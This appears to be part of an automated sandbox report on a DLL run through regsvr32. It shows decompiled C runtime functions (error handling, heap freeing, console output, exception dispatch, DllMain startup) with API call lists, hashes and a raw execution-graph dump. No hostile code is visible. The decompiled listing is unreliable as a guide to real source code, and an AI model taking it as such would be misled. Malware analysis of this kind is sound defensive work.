    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: cf6042b648d84da9201936f48e8921baca74af797b59627b598c325c4c0279a3
    • Instruction ID: dd0e51dff4244c7f3e39ebd9b144bc09fbf43c2d6b4110f512730f674ba788a9
    • Opcode Fuzzy Hash: cf6042b648d84da9201936f48e8921baca74af797b59627b598c325c4c0279a3
    • Instruction Fuzzy Hash: 3511A07271C5027A9B4756F59C81A6E226E9FD22BCB210E24F739AABD0DB65CC018D50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E6E9EDB13(void* __ecx) {
    				intOrPtr _t2;
    				signed int _t3;
    				signed int _t13;
    				signed int _t18;
    				long _t21;
    
    				_t21 = GetLastError();
    				_t2 =  *0x6e9fc110; // 0xffffffff
    				_t24 = _t2 - 0xffffffff;
    				if(_t2 == 0xffffffff) {
    					L6:
    					_t3 = E6E9EDF59(__eflags, _t2, 0xffffffff);
    					__eflags = _t3;
    					if(_t3 == 0) {
    						goto L3;
    					} else {
    						_t18 = E6E9EDC48(1, 0x364);
    						__eflags = _t18;
    						if(__eflags != 0) {
    							__eflags = E6E9EDF59(__eflags,  *0x6e9fc110, _t18);
    							if(__eflags != 0) {
    								E6E9ED7BE(_t18, 0x6e9fd850);
    								E6E9EDC0E(0);
    								goto L13;
    							} else {
    								_t13 = 0;
    								E6E9EDF59(__eflags,  *0x6e9fc110, 0);
    								_push(_t18);
    								goto L9;
    							}
    						} else {
    							_t13 = 0;
    							__eflags = 0;
    							E6E9EDF59(0,  *0x6e9fc110, 0);
    							_push(0);
    							L9:
    							E6E9EDC0E();
    							goto L4;
    						}
    					}
    				} else {
    					_t18 = E6E9EDF1A(_t24, _t2);
    					if(_t18 == 0) {
    						_t2 =  *0x6e9fc110; // 0xffffffff
    						goto L6;
    					} else {
    						if(_t18 != 0xffffffff) {
    							L13:
    							_t13 = _t18;
    						} else {
    							L3:
    							_t13 = 0;
    							L4:
    							_t18 = _t13;
    						}
    					}
    				}
    				SetLastError(_t21);
    				asm("sbb edi, edi");
    				return  ~_t18 & _t13;
    			}









    APIs
    • GetLastError.KERNEL32(?,?,?,6E9ED472,6E9F0290,?,6E9ED4C9,?,00000004,?,?,?,?,6E9ECFC7,?,?), ref: 6E9EDB18
    • _free.LIBCMT ref: 6E9EDB75
    • _free.LIBCMT ref: 6E9EDBAB
    • SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E9ED4C9,?,00000004,?,?,?,?,6E9ECFC7,?,?,00000004), ref: 6E9EDBB6
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: ErrorLast_free
    • String ID:
    • API String ID: 2283115069-0
    • Opcode ID: e23f666a1cfe3f6690b8b433de640e998446e7254efb23572f0592efafd8f89c
    • Instruction ID: cb2426093db115a57666725cc76ca2749648936d5132a7f0ab97371a7ed44636
    • Opcode Fuzzy Hash: e23f666a1cfe3f6690b8b433de640e998446e7254efb23572f0592efafd8f89c
    • Instruction Fuzzy Hash: 0C11C2726185016AD74746F95C81E6A235E9FD23B87284E24F33596BC0EA61CC018D50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9F2BEE(void* _a4, long _a8, DWORD* _a12) {
    				void* _t13;
    
    				_t13 = WriteConsoleW( *0x6e9fc860, _a4, _a8, _a12, 0);
    				if(_t13 == 0 && GetLastError() == 6) {
    					E6E9F2BD7();
    					E6E9F2B99();
    					_t13 = WriteConsoleW( *0x6e9fc860, _a4, _a8, _a12, _t13);
    				}
    				return _t13;
    			}





    APIs
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001), ref: 6E9F2C05
    • GetLastError.KERNEL32(?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001,?,00000001,?,6E9F1244,6E9EE286), ref: 6E9F2C11
      • Part of subcall function 6E9F2BD7: CloseHandle.KERNEL32(FFFFFFFE,6E9F2C21,?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001,?,00000001), ref: 6E9F2BE7
    • ___initconout.LIBCMT ref: 6E9F2C21
      • Part of subcall function 6E9F2B99: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E9F2BC8,6E9F2777,00000001,?,6E9F0CF8,?,?,00000001,?), ref: 6E9F2BAC
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6E9F278A,?,00000001,?,00000001,?,6E9F0CF8,?,?,00000001,?), ref: 6E9F2C36
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: 94836ffff2b6db931f6989f14b22137b75a14a0b2bc000c5efaddf13b3e6aa1e
    • Instruction ID: 886c8ab94524c36398b12193c29dbaa89c3e8f8d41509452e4c0b74130c1732d
    • Opcode Fuzzy Hash: 94836ffff2b6db931f6989f14b22137b75a14a0b2bc000c5efaddf13b3e6aa1e
    • Instruction Fuzzy Hash: 14F01C36104558BBCF121FE1EC08AC93F6AEF4B7A5F058410FE1996120C732CC20EB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9ED260() {
    
    				E6E9EDC0E( *0x6e9fd844);
    				 *0x6e9fd844 = 0;
    				E6E9EDC0E( *0x6e9fd848);
    				 *0x6e9fd848 = 0;
    				E6E9EDC0E( *0x6e9fd9c8);
    				 *0x6e9fd9c8 = 0;
    				E6E9EDC0E( *0x6e9fd9cc);
    				 *0x6e9fd9cc = 0;
    				return 1;
    			}




    APIs
    • _free.LIBCMT ref: 6E9ED269
      • Part of subcall function 6E9EDC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?), ref: 6E9EDC24
      • Part of subcall function 6E9EDC0E: GetLastError.KERNEL32(?,?,6E9F199E,?,00000000,?,?,?,6E9F19C5,?,00000007,?,?,6E9F04FE,?,?), ref: 6E9EDC36
    • _free.LIBCMT ref: 6E9ED27C
    • _free.LIBCMT ref: 6E9ED28D
    • _free.LIBCMT ref: 6E9ED29E
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 1b1f4b75ead9c1071196169ce390e7b3b28a33a9548470ee03233c13b78ccc75
    • Instruction ID: ffee10e280a6d1227c949e178b854aadad9e6fd8cf8f0f6468ced24064e19f77
    • Opcode Fuzzy Hash: 1b1f4b75ead9c1071196169ce390e7b3b28a33a9548470ee03233c13b78ccc75
    • Instruction Fuzzy Hash: 39E046B080A921DACF121FA4BA016CD3FBAEFD7650B210506E40202310C7B180929FC0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E6E9EC978(void* __edx, intOrPtr _a4) {
    				signed int _v8;
    				void* _v12;
    				char _v16;
    				char* _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				char* _t26;
    				intOrPtr* _t36;
    				signed int _t37;
    				signed int _t40;
    				char _t42;
    				signed int _t43;
    				intOrPtr* _t44;
    				intOrPtr* _t45;
    				intOrPtr _t48;
    				signed int _t49;
    				signed int _t54;
    				void* _t57;
    				intOrPtr* _t58;
    				signed int _t64;
    				signed int _t66;
    
    				_t57 = __edx;
    				_t48 = _a4;
    				if(_t48 != 0) {
    					__eflags = _t48 - 2;
    					if(_t48 == 2) {
    						L5:
    						E6E9EF8D2(_t48);
    						E6E9EF319(_t48, _t57, 0, 0x6e9fd430, 0, 0x6e9fd430, 0x104);
    						_t26 =  *0x6e9fd9d0; // 0x2aa32f0
    						 *0x6e9fd9c0 = 0x6e9fd430;
    						_v20 = _t26;
    						__eflags = _t26;
    						if(_t26 == 0) {
    							L7:
    							_t26 = 0x6e9fd430;
    							_v20 = 0x6e9fd430;
    							L8:
    							_v8 = 0;
    							_v16 = 0;
    							_t64 = E6E9ECC22(E6E9ECAAE( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
    							__eflags = _t64;
    							if(__eflags != 0) {
    								E6E9ECAAE( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
    								__eflags = _t48 - 1;
    								if(_t48 != 1) {
    									_v12 = 0;
    									_push( &_v12);
    									_t49 = E6E9EF20C(_t64, _t64);
    									__eflags = _t49;
    									if(_t49 == 0) {
    										_t58 = _v12;
    										_t54 = 0;
    										_t36 = _t58;
    										__eflags =  *_t58;
    										if( *_t58 == 0) {
    											L17:
    											_t37 = 0;
    											 *0x6e9fd9c4 = _t54;
    											_v12 = 0;
    											_t49 = 0;
    											 *0x6e9fd9c8 = _t58;
    											L18:
    											E6E9EDC0E(_t37);
    											_v12 = 0;
    											L19:
    											E6E9EDC0E(_t64);
    											_t40 = _t49;
    											L20:
    											return _t40;
    										} else {
    											goto L16;
    										}
    										do {
    											L16:
    											_t36 = _t36 + 4;
    											_t54 = _t54 + 1;
    											__eflags =  *_t36;
    										} while ( *_t36 != 0);
    										goto L17;
    									}
    									_t37 = _v12;
    									goto L18;
    								}
    								_t42 = _v8 - 1;
    								__eflags = _t42;
    								 *0x6e9fd9c4 = _t42;
    								_t43 = _t64;
    								_t64 = 0;
    								 *0x6e9fd9c8 = _t43;
    								L12:
    								_t49 = 0;
    								goto L19;
    							}
    							_t44 = E6E9ED46D(__eflags);
    							_push(0xc);
    							_pop(0);
    							 *_t44 = 0;
    							goto L12;
    						}
    						__eflags =  *_t26;
    						if( *_t26 != 0) {
    							goto L8;
    						}
    						goto L7;
    					}
    					__eflags = _t48 - 1;
    					if(__eflags == 0) {
    						goto L5;
    					}
    					_t45 = E6E9ED46D(__eflags);
    					_t66 = 0x16;
    					 *_t45 = _t66;
    					E6E9EC24F();
    					_t40 = _t66;
    					goto L20;
    				}
    				return 0;
    			}


























    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID:
    • String ID: C:\Windows\SysWOW64\regsvr32.exe
    • API String ID: 0-3922119987
    • Opcode ID: 79acb4d56d19fb7497013acec7a64a86d82bd528d688edec89248fe3c3197f6f
    • Instruction ID: 90e943c568e6010200ce4c43b3bcecc79db5cea057d7c23737b39c52776a0d0e
    • Opcode Fuzzy Hash: 79acb4d56d19fb7497013acec7a64a86d82bd528d688edec89248fe3c3197f6f
    • Instruction Fuzzy Hash: 554198B1A05255BFCB12CBE9D880A9EBBBCEFD6304F100466E651AB740E770DA408F90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E6E9EB475(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				char _v24;
    				intOrPtr _v28;
    				signed int _v36;
    				void* _v40;
    				intOrPtr _v44;
    				signed int _v48;
    				intOrPtr _v56;
    				void _v60;
    				signed char* _v68;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t74;
    				void* _t75;
    				char _t76;
    				signed char _t78;
    				signed int _t80;
    				signed char* _t81;
    				signed int _t82;
    				signed int _t83;
    				intOrPtr* _t87;
    				void* _t90;
    				signed char* _t93;
    				intOrPtr* _t96;
    				signed char _t97;
    				intOrPtr _t98;
    				intOrPtr _t99;
    				intOrPtr* _t101;
    				signed int _t102;
    				signed int _t103;
    				signed char _t108;
    				signed char* _t111;
    				signed int _t112;
    				void* _t113;
    				signed char* _t116;
    				void* _t121;
    				signed int _t123;
    				void* _t130;
    				void* _t131;
    
    				_t110 = __edx;
    				_t100 = __ecx;
    				_t96 = _a4;
    				if( *_t96 == 0x80000003) {
    					return _t74;
    				} else {
    					_push(_t121);
    					_push(_t113);
    					_t75 = E6E9EAD86(_t96, __ecx, __edx, _t113, _t121);
    					if( *((intOrPtr*)(_t75 + 8)) != 0) {
    						__imp__EncodePointer(0);
    						_t121 = _t75;
    						if( *((intOrPtr*)(E6E9EAD86(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
    							_t87 = E6E9EA645(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
    							_t130 = _t130 + 0x1c;
    							if(_t87 != 0) {
    								L16:
    								return _t87;
    							}
    						}
    					}
    					_t76 = _a20;
    					_v24 = _t76;
    					_v20 = 0;
    					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
    						_push(_a28);
    						E6E9EA578(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
    						_t112 = _v36;
    						_t131 = _t130 + 0x18;
    						_t87 = _v40;
    						_v16 = _t87;
    						_v8 = _t112;
    						if(_t112 < _v28) {
    							_t102 = _t112 * 0x14;
    							_v12 = _t102;
    							do {
    								_t103 = 5;
    								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
    								_t131 = _t131 + 0xc;
    								if(_v60 <= _t90 && _t90 <= _v56) {
    									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
    									_t108 = _t93[4];
    									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
    										if(( *_t93 & 0x00000040) == 0) {
    											_push(0);
    											_push(1);
    											E6E9EB04B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
    											_t112 = _v8;
    											_t131 = _t131 + 0x30;
    										}
    									}
    								}
    								_t112 = _t112 + 1;
    								_t87 = _v16;
    								_t102 = _v12 + 0x14;
    								_v8 = _t112;
    								_v12 = _t102;
    							} while (_t112 < _v28);
    						}
    						goto L16;
    					}
    					E6E9ED547(_t96, _t100, _t110, 0, _t121);
    					asm("int3");
    					_t111 = _v68;
    					_push(_t96);
    					_push(_t121);
    					_push(0);
    					_t78 = _t111[4];
    					if(_t78 == 0) {
    						L41:
    						_t80 = 1;
    					} else {
    						_t101 = _t78 + 8;
    						if( *_t101 == 0) {
    							goto L41;
    						} else {
    							_t116 = _a4;
    							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
    								_t97 = _t116[4];
    								_t123 = 0;
    								if(_t78 == _t97) {
    									L33:
    									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
    										_t81 = _a8;
    										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
    											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
    												_t123 = 1;
    											}
    										}
    									}
    									_t80 = _t123;
    								} else {
    									_t59 = _t97 + 8; // 0x6e
    									_t82 = _t59;
    									while(1) {
    										_t98 =  *_t101;
    										if(_t98 !=  *_t82) {
    											break;
    										}
    										if(_t98 == 0) {
    											L29:
    											_t83 = _t123;
    										} else {
    											_t99 =  *((intOrPtr*)(_t101 + 1));
    											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
    												break;
    											} else {
    												_t101 = _t101 + 2;
    												_t82 = _t82 + 2;
    												if(_t99 != 0) {
    													continue;
    												} else {
    													goto L29;
    												}
    											}
    										}
    										L31:
    										if(_t83 == 0) {
    											goto L33;
    										} else {
    											_t80 = 0;
    										}
    										goto L42;
    									}
    									asm("sbb eax, eax");
    									_t83 = _t82 | 0x00000001;
    									goto L31;
    								}
    							} else {
    								goto L41;
    							}
    						}
    					}
    					L42:
    					return _t80;
    				}
    			}
















































    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E9EB49A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: EncodePointer
    • String ID: MOC$RCC
    • API String ID: 2118026453-2084237596
    • Opcode ID: 943868e12fb7abce60ad4fc6c884de2aef6cb2074370a782f7010bd98ba7011b
    • Instruction ID: a800fabcc5f9de88481d01bcb026544365ab169e725fa02f203a4ff5538e5590
    • Opcode Fuzzy Hash: 943868e12fb7abce60ad4fc6c884de2aef6cb2074370a782f7010bd98ba7011b
    • Instruction Fuzzy Hash: B741487290020AAFDF26CFD4C880AEE7BB9BF48304F148499FA15A6668E735D950DF51
    Uniqueness

    Uniqueness Score: -1.00%

    Execution Graph

    Execution Coverage:9.8%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:0%
    Total number of Nodes:1661
    Total number of Limit Nodes:25
6f84a93f 10446 6f84a94a 10445->10446 10447 6f84bc68 ___vcrt_uninitialize_locks DeleteCriticalSection 10445->10447 10446->10424 10447->10443 10480 6f84fe32 10448->10480 10452 6f84bc35 10451->10452 10454 6f84bc5e 10452->10454 10455 6f84a933 10452->10455 10465 6f84bfd9 10452->10465 10456 6f84bc68 ___vcrt_uninitialize_locks DeleteCriticalSection 10454->10456 10455->10443 10457 6f84ae26 10455->10457 10456->10455 10470 6f84beea 10457->10470 10462 6f84ae56 10462->10445 10463 6f84ae59 ___vcrt_uninitialize_ptd 6 API calls 10464 6f84ae3b 10463->10464 10464->10445 10466 6f84bea1 ___vcrt_FlsFree 5 API calls 10465->10466 10467 6f84bff3 10466->10467 10468 6f84c011 InitializeCriticalSectionAndSpinCount 10467->10468 10469 6f84bffc 10467->10469 10468->10469 10469->10452 10471 6f84bea1 ___vcrt_FlsFree 5 API calls 10470->10471 10472 6f84bf04 10471->10472 10473 6f84bf1d TlsAlloc 10472->10473 10474 6f84ae30 10472->10474 10474->10464 10475 6f84bf9b 10474->10475 10476 6f84bea1 ___vcrt_FlsFree 5 API calls 10475->10476 10477 6f84bfb5 10476->10477 10478 6f84bfd0 TlsSetValue 10477->10478 10479 6f84ae49 10477->10479 10478->10479 10479->10462 10479->10463 10481 6f84fe42 10480->10481 10482 6f848fb3 10480->10482 10481->10482 10484 6f84e5bd 10481->10484 10482->10428 10482->10429 10485 6f84e5c9 CallCatchBlock 10484->10485 10496 6f84e955 EnterCriticalSection 10485->10496 10487 6f84e5d0 10497 6f851418 10487->10497 10490 6f84e5ee 10521 6f84e614 10490->10521 10496->10487 10498 6f851424 CallCatchBlock 10497->10498 10499 6f85142d 10498->10499 10500 6f85144e 10498->10500 10502 6f84d46d _free 14 API calls 10499->10502 10524 6f84e955 EnterCriticalSection 10500->10524 10503 6f851432 10502->10503 10504 6f84c24f ___std_exception_copy 25 API calls 10503->10504 10506 6f84e5df 10504->10506 10505 6f851486 10532 6f8514ad 10505->10532 10506->10490 10510 6f84e453 GetStartupInfoW 10506->10510 10507 6f85145a 10507->10505 10525 6f851368 10507->10525 10511 6f84e504 10510->10511 10512 6f84e470 10510->10512 10516 6f84e509 
10511->10516 10512->10511 10513 6f851418 26 API calls 10512->10513 10514 6f84e498 10513->10514 10514->10511 10515 6f84e4c8 GetFileType 10514->10515 10515->10514 10520 6f84e510 10516->10520 10517 6f84e553 GetStdHandle 10517->10520 10518 6f84e5b9 10518->10490 10519 6f84e566 GetFileType 10519->10520 10520->10517 10520->10518 10520->10519 10541 6f84e99d LeaveCriticalSection 10521->10541 10523 6f84e5ff 10523->10481 10524->10507 10526 6f84dc48 __dosmaperr 14 API calls 10525->10526 10528 6f85137a 10526->10528 10527 6f851387 10529 6f84dc0e _free 14 API calls 10527->10529 10528->10527 10535 6f84df9b 10528->10535 10531 6f8513dc 10529->10531 10531->10507 10540 6f84e99d LeaveCriticalSection 10532->10540 10534 6f8514b4 10534->10506 10536 6f84ddba __dosmaperr 5 API calls 10535->10536 10537 6f84dfb7 10536->10537 10538 6f84dfd5 InitializeCriticalSectionAndSpinCount 10537->10538 10539 6f84dfc0 10537->10539 10538->10539 10539->10528 10540->10534 10541->10523 10543 6f848fd6 10542->10543 10544 6f848fd2 10542->10544 10545 6f849839 __DllMainCRTStartup@12 4 API calls 10543->10545 10547 6f848fe3 ___scrt_release_startup_lock 10543->10547 10544->10432 10546 6f84904c 10545->10546 10547->10432 10554 6f84d990 10548->10554 10551 6f84a958 10620 6f84ad50 10551->10620 10555 6f84d99a 10554->10555 10556 6f848f20 10554->10556 10557 6f84df1a __dosmaperr 6 API calls 10555->10557 10556->10551 10558 6f84d9a1 10557->10558 10558->10556 10559 6f84df59 __dosmaperr 6 API calls 10558->10559 10560 6f84d9b4 10559->10560 10562 6f84d857 10560->10562 10563 6f84d862 10562->10563 10567 6f84d872 10562->10567 10568 6f84d878 10563->10568 10566 6f84dc0e _free 14 API calls 10566->10567 10567->10556 10569 6f84d893 10568->10569 10570 6f84d88d 10568->10570 10572 6f84dc0e _free 14 API calls 10569->10572 10571 6f84dc0e _free 14 API calls 10570->10571 10571->10569 10573 6f84d89f 10572->10573 10574 6f84dc0e _free 14 API calls 10573->10574 10575 6f84d8aa 10574->10575 10576 6f84dc0e _free 14 API calls 10575->10576 10577 6f84d8b5 
10576->10577 10578 6f84dc0e _free 14 API calls 10577->10578 10579 6f84d8c0 10578->10579 10580 6f84dc0e _free 14 API calls 10579->10580 10581 6f84d8cb 10580->10581 10582 6f84dc0e _free 14 API calls 10581->10582 10583 6f84d8d6 10582->10583 10584 6f84dc0e _free 14 API calls 10583->10584 10585 6f84d8e1 10584->10585 10586 6f84dc0e _free 14 API calls 10585->10586 10587 6f84d8ec 10586->10587 10588 6f84dc0e _free 14 API calls 10587->10588 10589 6f84d8fa 10588->10589 10594 6f84d6a4 10589->10594 10595 6f84d6b0 CallCatchBlock 10594->10595 10610 6f84e955 EnterCriticalSection 10595->10610 10599 6f84d6ba 10600 6f84dc0e _free 14 API calls 10599->10600 10601 6f84d6e4 10599->10601 10600->10601 10611 6f84d703 10601->10611 10602 6f84d70f 10603 6f84d71b CallCatchBlock 10602->10603 10615 6f84e955 EnterCriticalSection 10603->10615 10605 6f84d725 10606 6f84d945 __dosmaperr 14 API calls 10605->10606 10607 6f84d738 10606->10607 10616 6f84d758 10607->10616 10610->10599 10614 6f84e99d LeaveCriticalSection 10611->10614 10613 6f84d6f1 10613->10602 10614->10613 10615->10605 10619 6f84e99d LeaveCriticalSection 10616->10619 10618 6f84d746 10618->10566 10619->10618 10621 6f84ad5d 10620->10621 10627 6f848f25 10620->10627 10624 6f84ad6b 10621->10624 10628 6f84bf60 10621->10628 10623 6f84bf9b ___vcrt_FlsSetValue 6 API calls 10625 6f84ad7b 10623->10625 10624->10623 10633 6f84ad34 10625->10633 10627->10391 10629 6f84bea1 ___vcrt_FlsFree 5 API calls 10628->10629 10630 6f84bf7a 10629->10630 10631 6f84bf86 10630->10631 10632 6f84bf92 TlsGetValue 10630->10632 10631->10624 10632->10631 10634 6f84ad3e 10633->10634 10636 6f84ad4b 10633->10636 10635 6f84c2b0 ___std_type_info_destroy_list 14 API calls 10634->10635 10634->10636 10635->10636 10636->10627 10643 6f84ad94 10637->10643 10639 6f848f01 10639->10418 10640 6f84d2f0 10639->10640 10641 6f84db13 __dosmaperr 14 API calls 10640->10641 10642 6f848f0d 10641->10642 10642->10416 10642->10417 10644 6f84ada0 GetLastError 10643->10644 10645 6f84ad9d 10643->10645 
10646 6f84bf60 ___vcrt_FlsGetValue 6 API calls 10644->10646 10645->10639 10647 6f84adb5 10646->10647 10648 6f84ae1a SetLastError 10647->10648 10649 6f84bf9b ___vcrt_FlsSetValue 6 API calls 10647->10649 10656 6f84add4 10647->10656 10648->10639 10650 6f84adce __InternalCxxFrameHandler 10649->10650 10651 6f84bf9b ___vcrt_FlsSetValue 6 API calls 10650->10651 10653 6f84adf6 10650->10653 10650->10656 10651->10653 10652 6f84bf9b ___vcrt_FlsSetValue 6 API calls 10654 6f84ae0a 10652->10654 10653->10652 10653->10654 10655 6f84c2b0 ___std_type_info_destroy_list 14 API calls 10654->10655 10655->10656 10656->10648 12055 6f84fe29 12056 6f84fe42 12055->12056 12057 6f84fe60 12055->12057 12056->12057 12058 6f84e5bd 30 API calls 12056->12058 12058->12056 9911 6f84c2b0 9912 6f84dc0e _free 14 API calls 9911->9912 9913 6f84c2c8 9912->9913 9914 6f8495e3 9915 6f8495f1 9914->9915 9916 6f8495ec 9914->9916 9920 6f8494ad 9915->9920 9931 6f8499f5 9916->9931 9922 6f8494b9 CallCatchBlock 9920->9922 9921 6f8494e2 dllmain_raw 9923 6f8494fc dllmain_crt_dispatch 9921->9923 9928 6f8494c8 9921->9928 9922->9921 9927 6f8494dd __DllMainCRTStartup@12 9922->9927 9922->9928 9923->9927 9923->9928 9924 6f84954e 9925 6f849557 dllmain_crt_dispatch 9924->9925 9924->9928 9926 6f84956a dllmain_raw 9925->9926 9925->9928 9926->9928 9927->9924 9935 6f8493fd 9927->9935 9930 6f849543 dllmain_raw 9930->9924 9932 6f849a0b 9931->9932 9934 6f849a14 9932->9934 10192 6f8499a8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9932->10192 9934->9915 9937 6f849409 CallCatchBlock __DllMainCRTStartup@12 9935->9937 9936 6f849412 9936->9930 9937->9936 9938 6f8494a5 9937->9938 9939 6f84943a 9937->9939 9979 6f849839 IsProcessorFeaturePresent 9938->9979 9958 6f848f5c 9939->9958 9942 6f84943f 9967 6f849a52 9942->9967 9944 6f8494ac CallCatchBlock 9945 6f8494e2 dllmain_raw 9944->9945 9954 6f8494dd __DllMainCRTStartup@12 9944->9954 9955 6f8494c8 9944->9955 9947 6f8494fc dllmain_crt_dispatch 9945->9947 
9945->9955 9946 6f849444 __RTC_Initialize __DllMainCRTStartup@12 9970 6f8490fe 9946->9970 9947->9954 9947->9955 9951 6f84954e 9952 6f849557 dllmain_crt_dispatch 9951->9952 9951->9955 9953 6f84956a dllmain_raw 9952->9953 9952->9955 9953->9955 9954->9951 9956 6f8493fd __DllMainCRTStartup@12 79 API calls 9954->9956 9955->9930 9957 6f849543 dllmain_raw 9956->9957 9957->9951 9959 6f848f61 ___scrt_release_startup_lock 9958->9959 9960 6f848f65 9959->9960 9963 6f848f71 __DllMainCRTStartup@12 9959->9963 9983 6f84d157 9960->9983 9964 6f848f7e 9963->9964 9986 6f84c801 9963->9986 9964->9942 10067 6f84ad11 InterlockedFlushSList 9967->10067 9971 6f84910a 9970->9971 9972 6f849120 9971->9972 10071 6f84d303 9971->10071 9976 6f84949f 9972->9976 9974 6f849118 10076 6f84a963 9974->10076 10175 6f848f7f 9976->10175 9980 6f84984f CallUnexpected 9979->9980 9981 6f8498fa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9980->9981 9982 6f849945 CallUnexpected 9981->9982 